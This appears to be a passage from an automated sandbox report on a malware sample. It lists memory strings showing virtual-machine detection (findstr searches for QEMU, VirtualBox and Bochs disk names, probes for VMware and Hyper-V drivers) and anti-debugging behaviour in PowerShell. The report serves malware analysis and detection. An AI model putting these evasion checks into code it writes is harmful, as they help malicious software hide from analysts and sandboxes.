Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2y
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Checks if the current process is being debugged

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_000002241390CD80

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

19_2_0000022413901D30

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241390CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139084B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413908814
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002241393CD80
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00000224139384B0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000022413938814
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E3CD80
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002BCD7E384B0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002BCD7E38814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EA84B0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_0000026504EA8814
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_0000026504EACD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1AC84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1AC8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1ACCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CE84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_0000025DC1CE8814
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0000025DC1CECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002A661308814
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE4CD80
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000002BAAEE48814
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000002BAAEE484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F484B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000026A87F48814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000026A87F4CD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537A8814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537DCD80
